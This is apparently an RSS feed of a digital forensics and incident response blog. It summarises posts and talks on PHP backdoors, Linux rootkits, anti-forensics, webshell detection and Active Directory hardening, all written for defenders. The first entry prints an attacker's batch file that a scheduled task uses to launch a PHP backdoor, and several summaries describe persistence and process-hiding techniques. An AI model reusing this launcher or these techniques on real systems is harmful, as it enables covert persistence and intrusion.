https://dfir.ch/ Recent content on dfir.ch Hugo -- gohugo.io en-us Sun, 16 Nov 2025 16:04:20 +0200 https://dfir.ch/posts/dissection_php_backdoor/ Sun, 16 Nov 2025 16:04:20 +0200 https://dfir.ch/posts/dissection_php_backdoor/ Introduction During a recent Incident Response engagement, my colleague Asger Deleuran Strunk identified an unusual Scheduled Task while reviewing AutoRuns data from all servers and workstations across the network. The task, named ClockLauncher, referenced a batch file located at: C:\Windows\Temp\{0b1281f3-c9bc-4b85-ad92-0803ed04208f}\php_2\run-clock.bat Here is the content of the file run-clock.bat: @echo off cd /d "C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\" "C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\php-win.exe" "C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\5.php" exit The executable php-win.exe is running 5.php from a non-standard directory, C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\. The whole chain, starting from the filename to the directory, looks highly suspicious. https://dfir.ch/talks/bsides_berlin_2025/ Sat, 08 Nov 2025 16:04:20 +0200 https://dfir.ch/talks/bsides_berlin_2025/ Abstract Your mission, if you choose to accept it: take on the role of a detection engineer to dissect the most popular attack framework for attacks against macOS, Mythic. Mythic has various agents that can be easily integrated into the framework. In this talk, we will show common features of the agents, including how C2 communication works, how persistences can be set up, and how additional code can be executed. Our goal is to develop robust strategies for detecting these agents and to identify additional traces on the system that can be found by executing these agents on an infected computer. https://dfir.ch/talks/bsides_chisinau_2025/ Fri, 31 Oct 2025 16:04:20 +0200 https://dfir.ch/talks/bsides_chisinau_2025/ Abstract For two decades, the security industry has promised progress: firewalls, antivirus, EDR, XDR, Zero Trust. Budgets have soared, tools have multiplied. And yet attackers still win with the same tricks. Why? Because while we buy shiny solutions, we continue to neglect the basics. This keynote cuts through the illusion of progress and shows why culture and discipline - not the next silver bullet product- are the real missing pieces. https://dfir.ch/posts/today_i_learned_binfmt_misc/ Thu, 30 Oct 2025 04:04:20 +0200 https://dfir.ch/posts/today_i_learned_binfmt_misc/ Introduction binfmt_misc (short for Binary Format Miscellaneous) is a Linux kernel feature that allows the system to recognize and execute files based on custom binary formats. It’s part of the Binary Format (binfmt) subsystem, which determines how the kernel runs an executable file. Normally, Linux only knows how to run native binaries (like ELF files compiled for the system’s CPU architecture, and a few other file types). binfmt_misc extends this by allowing other kinds of files, scripts, binaries for other architectures, or even custom file types, to be executed as if they were native. https://dfir.ch/talks/hack.lu_2025/ Tue, 21 Oct 2025 16:04:20 +0200 https://dfir.ch/talks/hack.lu_2025/ Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood. From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent. Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response. https://dfir.ch/talks/troopers_2025/ Wed, 25 Jun 2025 16:04:20 +0200 https://dfir.ch/talks/troopers_2025/ Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood. From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent. Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response. https://dfir.ch/talks/firstcon_2025/ Tue, 24 Jun 2025 16:04:20 +0200 https://dfir.ch/talks/firstcon_2025/ Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood. From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent. Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response. https://dfir.ch/talks/euskalhack_2025/ Fri, 20 Jun 2025 16:04:20 +0200 https://dfir.ch/talks/euskalhack_2025/ Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks. https://dfir.ch/talks/x33fcon_2025/ Thu, 12 Jun 2025 16:04:20 +0200 https://dfir.ch/talks/x33fcon_2025/ Abstract Learn the essentials of macOS forensic analysis, from foundational concepts to advanced techniques, in this comprehensive journey into the world of macOS security. Figure 1: From Zero to a Moderately Skilled MacOS Forensic Analyst Youtube Video https://dfir.ch/talks/securityfest_2025/ Thu, 05 Jun 2025 16:04:20 +0200 https://dfir.ch/talks/securityfest_2025/ Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood. From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent. Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response. https://dfir.ch/posts/linux_capabilities/ Fri, 16 May 2025 03:04:20 +0200 https://dfir.ch/posts/linux_capabilities/ Introduction Notes to kernel developers: The goal of capabilities is divide the power of superuser into pieces, such that if a program that has one or more capabilities is compromised, its power to do damage to the system would be less than the same program running with root privilege. Capabilities(7) — Linux manual page Capabilities are a fine-grained access control mechanism in Linux, allowing more granular permissions than the traditional superuser (root) model. https://dfir.ch/talks/bsides_transylvania_2025/ Sat, 10 May 2025 16:04:20 +0200 https://dfir.ch/talks/bsides_transylvania_2025/ Abstract Learn the essentials of macOS forensic analysis, from foundational concepts to advanced techniques, in this comprehensive journey into the world of macOS security. Figure 1: BSides Transylvania: From Zero to a Moderately Skilled MacOS Forensic Analyst Youtube Video Not recorded. https://dfir.ch/talks/first_amsterdam_2025/ Thu, 27 Mar 2025 16:04:20 +0200 https://dfir.ch/talks/first_amsterdam_2025/ Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks. https://dfir.ch/talks/bsides_kent_2025/ Sat, 22 Mar 2025 16:04:20 +0200 https://dfir.ch/talks/bsides_kent_2025/ Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics. https://dfir.ch/posts/today_i_learned_protected_symlinks/ Mon, 24 Feb 2025 04:04:20 +0200 https://dfir.ch/posts/today_i_learned_protected_symlinks/ Introduction A long-standing class of security issues is the symlink-based time-of-check-time-of-use race, most commonly seen in world-writable directories like /tmp. The common method of exploitation of this flaw is to cross privilege boundaries when following a given symlink (i.e. a root process follows a symlink belonging to another user). For a likely incomplete list of hundreds of examples across the years, please see: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=/tmp. Source: Sysctl Explorer The protected_symlinks setting within the Linux Kernel helps prevent TOCTOU (time-of-check-time-of-use) vulnerabilities in privileged processes. https://dfir.ch/posts/macos_extended_attributes/ Sat, 15 Feb 2025 12:04:20 +0200 https://dfir.ch/posts/macos_extended_attributes/ Introduction Extended attributes (EAs) are a powerful and sometimes overlooked feature of macOS’s file system, storing additional metadata about files beyond what standard attributes like file name, size, and permissions allow. While these attributes are invisible in typical file interactions, they play a critical role in various macOS features and workflows. Inspecting Extended Attributes macOS provides several tools for working with extended attributes. These include: The ls command (the @ at the end of the permissions indicates extended attributes): -rw-r--r--@ 1 malmoeb staff 202767345 Jan 6 13:29 Webex. https://dfir.ch/posts/tear_down_castle_part_two/ Thu, 30 Jan 2025 11:04:20 +0200 https://dfir.ch/posts/tear_down_castle_part_two/ This is the second part of a two-part series about Active Directory security. Read the first part here. To gain insight into common issues and patterns of misconfiguration, we analyzed 250 PingCastle reports collected from Incident Response cases and Compromise Assessments. We indicate how many of the 250 domains checked were affected by the finding (Affected Domains: N/250). PingCastle is a popular tool for auditing the security of Active Directory environments, pinpointing vulnerabilities, and offering actionable recommendations for improvement. https://dfir.ch/posts/suspicious_network_traffic_ransomware/ Wed, 22 Jan 2025 12:04:20 +0200 https://dfir.ch/posts/suspicious_network_traffic_ransomware/ Introduction A customer contacted us due to a high-severity ransomware alert in Windows Defender for Endpoint (Figure 1). Figure 1: Suspicious network traffic detected including Ransomware Clicking on one of the alerts does not reveal additional details besides the IP address (Figure 2). Figure 2: Process Tree After further clicks, we end up at the explanation in Figure 3, which doesn’t inspire confidence. What exactly is happening here, and which process on the host is responsible for these network connections? https://dfir.ch/posts/tear_down_castle_part_one/ Sun, 19 Jan 2025 04:04:20 +0200 https://dfir.ch/posts/tear_down_castle_part_one/ Introduction In the realm of IT infrastructure, Active Directory (AD) serves as a crucial backbone, enabling organizations to manage users, devices, and resources efficiently. However, given its central role, it also presents a significant security target, and maintaining its integrity is paramount. Misconfigurations and overlooked security gaps in AD can expose an organization to critical vulnerabilities, leading to potential breaches, data theft, and system downtime. To gain insight into common issues and patterns of misconfiguration, we analyzed 250 PingCastle reports collected from Incident Response cases and Compromise Assessments. https://dfir.ch/posts/publish_python_pth_extension/ Tue, 14 Jan 2025 03:04:20 +0200 https://dfir.ch/posts/publish_python_pth_extension/ Introduction The purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts by an import and its main content is stored as a base64 encoded blob. The .pth extension is used to append additional paths to a Python module. Starting with the release of Python 3.5, lines in .pth files beginning with the text “import” followed by a space or a tab, are executed as described in the official documentation. https://dfir.ch/posts/today_i_learned_setfacl/ Tue, 17 Dec 2024 08:04:20 +0200 https://dfir.ch/posts/today_i_learned_setfacl/ Introduction setfacl is a command-line utility in Linux/Unix systems used to set Access Control Lists (ACLs) on files and directories. ACLs provide a more flexible permission mechanism than the traditional owner-group-other model. They allow for the assignment of specific permissions to individual users or groups beyond what the basic file system permissions support. setfacl [options] [permissions] file/directory Options: -m: Modify or add an ACL entry. -x: Remove an ACL entry. -b: Remove all ACL entries. https://dfir.ch/posts/shell_script_compiler/ Wed, 11 Dec 2024 14:04:20 +0200 https://dfir.ch/posts/shell_script_compiler/ Introduction After installing the payload, the shell script inst.sh runs a backdoor binary that matches the target device’s architecture. The backdoor is a shell script compiled using an open-source project called Shell Script Compiler (shc), and enables the threat actors to perform subsequent malicious activities and deploy additional tools on affected systems." Source: IoT devices and Linux-based systems targeted by OpenSSH trojan campaign, Microsoft Threat Intelligence In this blog post, we will analyze Shc - A generic shell script compiler, mentioned by Microsoft in the linked blog post above. https://dfir.ch/talks/deepsec_2024/ Thu, 21 Nov 2024 16:04:20 +0200 https://dfir.ch/talks/deepsec_2024/ Abstract Cybercriminals now have unprecedented ease in creating their own remote access trojans (RATs), thanks to a plethora of open-source or leaked builders. One can generate a new binary with just a click of a button. We meticulously examine different builders, such as AgentTesla, DCRat, Nanocore, and others, to extract Indicators of Compromise. These indicators serve as valuable instruments for targeted hunting to detect infections within our networks. Building up on my research from last year, “N-IOC’s to rule them all”, we will analyze the binaries the same way, but this time with a focus on open-source builders for RATs. https://dfir.ch/talks/bsides_munich_2024/ Mon, 11 Nov 2024 16:04:20 +0200 https://dfir.ch/talks/bsides_munich_2024/ Abstract In the intricate landscape of cybersecurity, the ability to uncover hidden threats and analyze system behaviors is paramount.T The /proc filesystem, a critical component of Unix-like operating systems, serves as a treasure trove of real-time data and system information. In this talk, “/proc for Security Analysts,” will delve into the forensic value of /proc, demonstrating how it can be leveraged to detect rootkits, uncover anomalies, and gain a profound understanding of the operating system. https://dfir.ch/posts/reptile_launcher/ Sun, 10 Nov 2024 14:04:20 +0200 https://dfir.ch/posts/reptile_launcher/ Introduction “In REPTILE version 2.0, the original developer of REPTILE altered how the Kernel-level component is loaded, switching from using insmod to a custom launcher. The launcher Mandiant observed UNC3886 use throughout their operations, based on the custom launcher, was updated with a new function to daemonize a process.” — Mandiant, Cloaked and Covert: Uncovering UNC3886 Espionage Operations, 2024. This analysis will examine how the Reptile rootkit loader bypasses the standard Linux insmod command for loading Kernel modules and will explore methods for detecting the use of this custom loader. https://dfir.ch/talks/hack.lu_gist_2024/ Wed, 23 Oct 2024 16:04:20 +0200 https://dfir.ch/talks/hack.lu_gist_2024/ Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics. https://dfir.ch/talks/hack.lu_rootkits_2024/ Tue, 22 Oct 2024 16:04:20 +0200 https://dfir.ch/talks/hack.lu_rootkits_2024/ Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks. https://dfir.ch/posts/bedevil_dynamic_linker_patching/ Sat, 19 Oct 2024 11:03:20 +0200 https://dfir.ch/posts/bedevil_dynamic_linker_patching/ Introduction bedevil (bdvl), according to the GitHub page, is an LD_PRELOAD rootkit. Therefore, this rootkit runs in userland. The group Muddled Libra used bedevil to target VMware vCenter servers, according to Palo Alto’s Unit42 Blog, 2024. The rootkit comes with a nifty feature called Dynamic Linker Patching: Upon installation, the rootkit will patch the dynamic linker libraries. Before anything, the rootkit will search for a valid ld.so on the system to patch. https://dfir.ch/posts/defender_xdr_deception/ Thu, 10 Oct 2024 10:04:20 +0200 https://dfir.ch/posts/defender_xdr_deception/ Introduction This week wasn’t the first time we’ve investigated a case where a customer reported suspicious accounts that couldn’t be linked to any employees. In this case, two domain admin users were found on the affected network, but neither is employed by the company. Both accounts had logged into nearly every device within the organization, which understandably caused concern among those responsible, prompting them to ask us to investigate further. https://dfir.ch/posts/tmate_as_a_backdoor/ Sun, 06 Oct 2024 05:04:20 +0200 https://dfir.ch/posts/tmate_as_a_backdoor/ Introduction Over the last three years, various cyber security companies wrote about TeamTNT TTPs, notably about the use of tmate as their tool of choice for backdooring Linux servers after a compromise: TeamTNT: Cryptomining Explosion (Intezer, 2021) Attackers Abusing Various Remote Control Tools (ASEC, 2022) TeamTNT Reemerged with New Aggressive Cloud Campaign (Aqua, 2023) In this short blog post, we examine the traces left behind from a tmate installation and some hints on where to find traces when actively looking for backdoored Linux servers with an active tmate instance running. https://dfir.ch/posts/romhack_edr/ Mon, 30 Sep 2024 11:04:20 +0200 https://dfir.ch/posts/romhack_edr/ This course aims to provide a comprehensive understanding of the architecture of modern EDRs and their underlying Antivirus (AV) systems. It delves deeply into the complexity of modern EDRs, their structure, including the components responsible for real-time monitoring, data collection, and threat analysis. [..] 50% of the course will be dedicated to hands-on labs showing how to translate the theory principles into practice. Labs are designed to provide flexibility in terms of complexity and include bonus tracks to ensure that you always feel engaged and have something interesting to explore and learn. https://dfir.ch/posts/today_i_learned_nsg_flow_log/ Sat, 21 Sep 2024 05:04:20 +0200 https://dfir.ch/posts/today_i_learned_nsg_flow_log/ Introduction Azure flow logs are a feature in Azure that allows you to capture and analyze network traffic to and from virtual network interfaces (NICs) in Azure. Specifically, flow logs provide granular data about IP traffic flowing through a Network Security Group (NSG). Azure automatically creates a network security group (NSG) when you create a virtual machine: $vmname-nsg. This data includes information on the source and destination IP addresses, ports, and protocols, as well as traffic allowed or denied by NSG rules. https://dfir.ch/posts/scriptblock_smuggling/ Fri, 13 Sep 2024 05:04:20 +0200 https://dfir.ch/posts/scriptblock_smuggling/ Introduction PowerShell’s Script Block Logging is a security feature that records and logs the contents of all scripts and commands executed within PowerShell. This includes both legitimate administrative scripts and potentially malicious commands. When enabled, Script Block Logging generates detailed logs stored in the Windows Event Log under Microsoft-Windows-PowerShell/Operational. I have previously tweeted several times about PowerShell and why monitoring the executed PowerShell scripts is so important. A few of these tweets are listed here. https://dfir.ch/posts/botnex_fenix/ Thu, 22 Aug 2024 12:04:20 +0200 https://dfir.ch/posts/botnex_fenix/ Introduction To improve my rusty reverse-engineering skills, I’m going to analyze various malware samples that have come up in our incident response cases in loose succession. The first sample belongs to the Fenix botnet (sample here). In this post, we analyze a sophisticated malware infection chain that begins with a user downloading a ZIP file from a Dropbox link and culminates in the execution of a malicious shellcode. First Stage The infection chain begins when the user downloads a ZIP file from Dropbox using the Edge browser. https://dfir.ch/posts/today_i_learned_webdav_cache/ Fri, 09 Aug 2024 01:04:20 +0200 https://dfir.ch/posts/today_i_learned_webdav_cache/ Introduction User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here: Figure 1: opendir: 216.9.224[.]58:5555 Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server: LNK Analysis We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECMD. https://dfir.ch/posts/search-ms_protocol_handler/ Sun, 04 Aug 2024 05:04:20 +0200 https://dfir.ch/posts/search-ms_protocol_handler/ Introduction Last month, I stumbled upon a blog post from Trustwave titled Search & Spoof: Abuse of Windows Search to Redirect to Malware. Figure 1: Search & Spoof: Abuse of Windows Search to Redirect to Malware (Source: Trustwave) Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a sophisticated understanding of system vulnerabilities and user behaviors. https://dfir.ch/posts/tainted_kernels/ Fri, 12 Jul 2024 05:04:20 +0200 https://dfir.ch/posts/tainted_kernels/ Introduction A tainted kernel in Linux refers to a kernel that has been marked with one or more flags indicating that it is in a state that might affect its stability or functionality. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. Source: elastic Here are the main reasons a kernel might become tainted (list might not be exhaustive): https://dfir.ch/posts/today_i_learned_lkm_kernel.modules_disabled/ Wed, 10 Jul 2024 03:04:20 +0200 https://dfir.ch/posts/today_i_learned_lkm_kernel.modules_disabled/ Introduction The kernel.modules_disabled parameter is a security feature in the Linux kernel that prevents the loading and unloading of kernel modules. This setting is particularly useful for hardening a system against certain types of attacks, such as attempts to load malicious kernel modules (think rootkits) or manipulate the system at a low level. Mandiant recently published a blog post where they found, among other toolings used by the attackers, REPTILE. REPTILE is an open-source Linux rootkit, implemented as a loadable kernel module (LKM), that provides backdoor access to a system. https://dfir.ch/posts/systemd_path_activation/ Sat, 22 Jun 2024 05:04:20 +0200 https://dfir.ch/posts/systemd_path_activation/ This blog post outlines a method for monitoring changes to files and directories in Linux using path units. Administrators and defenders can be notified of modifications by creating a new path unit, which watches for changes to files and directories and links it to a service unit that executes a script when changes are detected. This setup might be particularly useful for detecting unauthorized access in environments where installing EDR solutions is not feasible. https://dfir.ch/posts/php_dangerous_functions_and_webshell/ Mon, 17 Jun 2024 09:04:20 +0200 https://dfir.ch/posts/php_dangerous_functions_and_webshell/ This blog post discusses how to enhance PHP security using the disable_functions directive, which prevents specific PHP functions from being executed. We further explore webshell detection techniques, highlighting the challenges of identifying webshells using Yara rules, proposing alternatives like manual analysis, frequency analysis of web server logs, and utilizing tools like Velociraptor and UAC along the way. Introduction The disable_functions directive in PHP is a security feature that allows administrators to disable specific PHP functions from being executed within PHP scripts. https://dfir.ch/talks/firstcon_2024/ Sun, 09 Jun 2024 16:04:20 +0200 https://dfir.ch/talks/firstcon_2024/ Abstract How do the bad guys can breach our defenses so fast? In this training, we will touch on different advanced topics that will give you a better understanding of how attacks are carried out and how we can protect ourselves better against them. Windows Credentials: The various forms of credentials and how they are used during authentication. We will learn how attackers can steal these credentials and move laterally with these credentials. https://dfir.ch/posts/today_i_learned_clamav_autoit/ Sun, 09 Jun 2024 04:04:20 +0200 https://dfir.ch/posts/today_i_learned_clamav_autoit/ Introduction A customer contacted us because they intend to use SimpleLAPS-GUI in their company. However, multiple AV vendors flag the precompiled binary (SimpleLapsGui.exe) as malicious (see here). According to the FAQ on the GitHub repository from SimpleLAPS-GUI: Does the exe version contains viruses? It is reported on “virustotal.com”. No it doesn’t. This happens because of the AutoIT v3 executable used as wrapper. You can download the PowerShell version instead. (Please note that the PowerShell script doesn’t hide its window. https://dfir.ch/talks/securityfest_2024/ Fri, 31 May 2024 16:04:20 +0200 https://dfir.ch/talks/securityfest_2024/ Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics. https://dfir.ch/posts/today_i_learned_zsh_sessions/ Sun, 26 May 2024 09:04:20 +0200 https://dfir.ch/posts/today_i_learned_zsh_sessions/ Zsh Sessions In a previous blog post (Today I Learned - Zsh History Timestamps), we discussed how Zsh records commands entered in the shell along with a timestamp, provided that the session remains open. This is useful for live response scenarios if we still have access to the session and can run commands like fc -lf or fc -li 100. However, Zsh also utilizes the .zsh_sessions directory, located at the root level of the user’s home directory. https://dfir.ch/posts/slash-proc/ Thu, 16 May 2024 10:40:20 +0200 https://dfir.ch/posts/slash-proc/ Introduction While working my way through the excellent “Linux Attack, Detection and Live Forensics” course from Defensive Security, I read the following line: If you are looking for a simple way how to hide your process from the process list, then the bind mount operation is the answer. In order not to violate any copyright, I googled around and found the following gist from Timb-machine, where the same commands of the course are reflected: https://dfir.ch/posts/cleanup_script_rmm/ Fri, 10 May 2024 09:26:20 +0200 https://dfir.ch/posts/cleanup_script_rmm/ Introduction Fox_threatintel tweeted recently about an open directory on 91.215.85.18:9380/. I downloaded all the files from this directory and stumbled upon a ‘cleaner’ script, which we will examine in this short blog post. The original script is available on VirusTotal. Figure 1: Tweet from Fox_threatintel Find installed software First, the script defines an array ($uninstallKeys), holding two registry keys: $uninstallKeys = @( "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" ) In our case, the script explicitly searches for the RMM products Atera and Splashtop: https://dfir.ch/posts/today_i_learned_zsh_timestamps/ Tue, 07 May 2024 19:58:20 +0200 https://dfir.ch/posts/today_i_learned_zsh_timestamps/ Zsh Timestamps In Zsh, which serves as the default shell for Kali, Gentoo, and macOS (replacing Bash in macOS Catalina), among others, the shell session retains the command history with timestamps in memory. Throughout the session, each executed command is logged in the history along with a timestamp denoting its execution time. To view the command history on a live system, we can execute one of the following commands, which not only display the history but also include the timestamps adjacent to the commands: https://dfir.ch/posts/canarytokens/ Mon, 06 May 2024 09:15:20 +0200 https://dfir.ch/posts/canarytokens/ Insider Threat? We were contacted by a company that regularly sends emails to customers promoting new services and discounts. An Excel is uploaded to a web server, where a job processes the file to create an email per customer, taking the email addresses from the uploaded Excel file. For a significant period of time, the company has been struggling with a serious issue - its competitors are reaching out to the same customers they intend to contact in the upcoming mailing, often a day or two earlier. https://dfir.ch/posts/today_i_learned_device_discovery/ Sat, 27 Apr 2024 08:04:20 +0200 https://dfir.ch/posts/today_i_learned_device_discovery/ Introduction A client contacted us following an alert triggered by their Network Detection and Response sensor (NDR), which flagged suspicious network behavior originating from a server within their internal network. The detected activity resembled a port scan, suggesting that the server might have been compromised and was possibly being exploited by an attacker for initial reconnaissance. What added to the concern was the specific choice of ports scanned during the activity. https://dfir.ch/posts/sysrv/ Sun, 14 Apr 2024 15:04:20 +0200 https://dfir.ch/posts/sysrv/ Introduction On a recent incident response case, a customer contacted us regarding their EDR detecting a crypto miner on a Linux endpoint. The identified malicious file, named 41hs1z, is accessible on VirusTotal. The folders and paths associated with each execution of the crypto miner may differ; however, here are some paths we encountered: /backup/files/excel/41hs1z /backup/files/xml/dotnet115/BeID/41hs1z /backup/files/xml/dotnet115/layouts/defaults/41hs1z Upon analysis, we discovered that the malware is a component of the Sysrv botnet. In this short blog post, we will examine the ELF binary to uncover its capabilities and identify IOCs associated with the sample. https://dfir.ch/tweets/varia/ Wed, 03 Apr 2024 16:27:19 +0200 https://dfir.ch/tweets/varia/ Seven Sins #1: Lack of patch management #2: Lack of MFA #3: Ignoring or misinterpreting AV alerts #4: Insufficient AD hardening #5: No in-depth analysis after a (security) incident #6: Direct access to the Internet #7: Lack of an EDR 10 AD Commandments #2: Service Accounts #3: Passwords #4: PowerShell Script Block Logging #5: Add Computers to the Domain #6: Privileges and Permissions #7: Harden Critical Accounts #8: Print Spooler Service #9: Relaying #10: Easy Wins (for Attackers) USB Malware Raspberry Robin Andromeda VBE VBE, Part 2 Macoute Sality vjw0rm Neshta Shodan Scan IP ranges for exposed services CobaltStrike Beacons Scan History Varia xlsxgrep https://dfir.ch/posts/microsocks_sonicwall/ Sat, 30 Mar 2024 08:15:20 +0200 https://dfir.ch/posts/microsocks_sonicwall/ Introduction In a recent investigation conducted by my colleague, Giuseppe Paternicola, it was discovered that the initial entry point that ultimately led to the deployment of the Abyss ransomware was a compromised SonicWall Secure Mobile Access (SonicWall SMA) device. The threat actor exploited CVE-2021-20039 to gain access (Authenticated Command Injection). Subsequent analysis of the SonicWall revealed that the attacker had placed two files on the device, as illustrated in Figure 1. https://dfir.ch/posts/azure_batch/ Fri, 15 Mar 2024 07:04:20 +0200 https://dfir.ch/posts/azure_batch/ Introduction A huge thanks to the Invictus-IR team for proofreading this blog post 🙏 Recently, I posted a tweet regarding an unpatched TeamCity server that an attacker exploited to deploy a CoinMiner. In response to my tweet, the X (former Twitter) user, the cybersecurity doge, shared another story they investigated: An attacker obtained access to an administrator Azure environment user. Once logged on the tenant he created a resource group, and built 3 different batch accounts insides. https://dfir.ch/posts/kentico_cms_rce/ Wed, 06 Mar 2024 20:04:20 +0200 https://dfir.ch/posts/kentico_cms_rce/ How it started Figure 1: An unhandled exception occurred in w3wp.exe The customer contacted us regarding sporadic crashes of the IIS worker process (w3wp.exe). Before engaging an Incident Response company, the customer attempted to resolve the issue by repeatedly restoring the websites from backup. Moreover, they set up an entirely new server and migrated the affected sites to it, only to encounter the same outcomes (crashing the w3wp process). Additionally, the client passed on the following information: https://dfir.ch/posts/aws_ransomware/ Wed, 21 Feb 2024 05:04:20 +0200 https://dfir.ch/posts/aws_ransomware/ Background A customer contacted us reporting that an attacker had deleted several AWS S3 buckets (before allegedly downloading the data). Subsequently, the attacker left a ransom note (depicted below, sensitive information has been redacted). In this blog, we examine a recovery binary left behind by the attackers after deleting the buckets and show that the binary is nothing more than a red herring to increase the pressure on the victim. https://dfir.ch/posts/strace/ Thu, 01 Feb 2024 08:04:20 +0200 https://dfir.ch/posts/strace/ Introduction Craig Rowland, Founder and CEO of Sandfly Security, delivered a presentation titled Evasive Linux Malware at the Oslo Cold Incident Response Conference last year (Slides here, Presentation here), dissecting the notorious BPFDoor malware. In this post, we will analyze the BPFDoor backdoor only with the Linux utility strace, trying to get as much information as possible about the malware by tracing the executed syscalls from the binary. Swift assessments of malware samples like these can prove particularly beneficial for Incident Response teams in identifying Indicators of Compromise (IOC) for creating detection mechanisms or hunting purposes. https://dfir.ch/posts/asyncrat_quasarrat/ Mon, 15 Jan 2024 16:04:20 +0200 https://dfir.ch/posts/asyncrat_quasarrat/ Introduction Recorded Future writes in their Adversary Infrastructure Report 2023: The top 5 malware families we detected this year are AsyncRAT, Quasar RAT, PlugX, ShadowPad, and DarkComet. Interestingly, the top 2 detections are open-source, and the last 3 are well-established tools, showing that our statement from last year’s report remains true: [The] high level of commodity tool use indicates that threat actors are more concerned with blending in and being non-attributable rather than being undetectable, or have simply determined that their targets are not likely to detect even these well-known tools. https://dfir.ch/tweets/azure/ Wed, 10 Jan 2024 16:27:19 +0200 https://dfir.ch/tweets/azure/ Anomalous tokens eM Client Hunting Shadow Admins Sign-Ins from Nigeria Operating Systems Risk Detections Shady ASNs UnifiedAuditLogIngestionEnabled “Set-MailboxJunkEmailConfiguration” Circumvented MFA Malicious Inbox rules Blocked Senders and Domains https://dfir.ch/tweets/dfir/ Wed, 10 Jan 2024 16:27:19 +0200 https://dfir.ch/tweets/dfir/ Persistence Techniques Get-Variable.exe Windows Silent Process Exit Word Templates PowerShell profile SSH Backdoor on Windows MPLog Microsoft Protection Log (MPLog) Find WebShells with the MPLog Yet another example of why the MPLog is awesome PowerShell Module Cache PowerShell V2 Exfiltration with Copy-Item PowerShell Script Block Logs AutoSaved files from PowerShell ISE Misc Windows Security Package AV Logs Bloodhound How to check GPO’s for signs of modifications WinSCP Artifacts RDP Logs Vulnerable Drivers Various ways to obfuscate an URL Ligolo-ng Silly misconfiguration - Great impact Windows Firewall Rules WMI Event Consumers Malpedia Hacked Wordpress site CoinMiner FileZilla Windows App Sideloading Audit breached passwords Recover deleted objects from AD https://dfir.ch/tweets/pingcastle/ Tue, 09 Jan 2024 16:27:19 +0200 https://dfir.ch/tweets/pingcastle/ #1: Passwords in GPO’s Original Tweet #2: Weak Password Policies Original 